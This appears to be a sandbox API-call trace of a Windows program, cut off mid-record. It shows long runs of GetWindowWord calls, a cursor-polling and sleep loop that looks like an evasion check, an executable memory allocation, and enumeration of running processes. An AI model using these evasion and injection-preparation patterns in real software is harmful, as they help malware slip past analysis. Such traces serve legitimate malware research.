[0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.902] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.903] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.904] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0127.709] GetWinMetaFileBits (in: hemf=0x0, cbData16=0x0, pData16=0x0, iMapMode=0, hdcRef=0x0 | out: pData16=0x0) returned 0x0 [0127.709] GetLastError () returned 0x57 [0127.710] GetCursorPos (in: lpPoint=0x47dec4 | out: lpPoint=0x47dec4*(x=1404, y=317)) returned 1 [0127.710] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0127.710] Sleep (dwMilliseconds=0x12) [0127.729] Sleep (dwMilliseconds=0xce) [0127.947] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0127.948] Sleep (dwMilliseconds=0x12) [0127.979] Sleep (dwMilliseconds=0xce) [0128.197] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0128.197] Sleep (dwMilliseconds=0x12) [0128.228] Sleep (dwMilliseconds=0xce) [0128.447] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0128.447] Sleep (dwMilliseconds=0x12) [0128.478] Sleep (dwMilliseconds=0xce) [0128.702] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0128.702] Sleep (dwMilliseconds=0x12) [0128.727] Sleep (dwMilliseconds=0xce) [0128.946] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0128.946] Sleep (dwMilliseconds=0x12) [0128.977] Sleep (dwMilliseconds=0xce) [0129.196] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0129.196] Sleep (dwMilliseconds=0x12) [0129.227] Sleep (dwMilliseconds=0xce) [0129.445] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0129.445] Sleep (dwMilliseconds=0x12) [0129.476] Sleep (dwMilliseconds=0xce) [0129.695] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0129.695] Sleep (dwMilliseconds=0x12) [0129.726] Sleep (dwMilliseconds=0xce) [0129.944] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0129.944] Sleep (dwMilliseconds=0x12) [0129.975] Sleep (dwMilliseconds=0xce) [0130.194] GetCursorPos (in: lpPoint=0x47debc | out: lpPoint=0x47debc*(x=1404, y=317)) returned 1 [0130.195] Sleep (dwMilliseconds=0x12) [0133.189] LoadLibraryA (lpLibFileName="shell32") returned 0x76100000 [0133.192] LoadLibraryA (lpLibFileName="user32") returned 0x75930000 [0133.192] LoadLibraryA (lpLibFileName="advapi32") returned 0x77330000 [0133.193] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x260000 [0133.193] VirtualAlloc (lpAddress=0x0, dwSize=0x101d0, flAllocationType=0x3000, flProtect=0x4) returned 0x650000 [0133.193] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0133.195] Process32FirstW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.195] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0133.196] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0133.196] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x12c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.197] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0133.197] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.197] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0133.198] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0133.198] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0133.198] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x164, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0133.199] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.199] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.199] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.200] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.200] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.200] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0133.201] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.201] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.201] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0133.202] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x430, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0133.202] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0133.202] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.203] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.203] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.203] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.204] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.204] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="leone.exe")) returned 1 [0133.205] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="translationsbuyerbrought.exe")) returned 1 [0133.205] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fisherswiftsqldocs.exe")) returned 1 [0133.205] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fell around statement mexico.exe")) returned 1 [0133.206] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="roughly_vulnerability.exe")) returned 1 [0133.206] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: 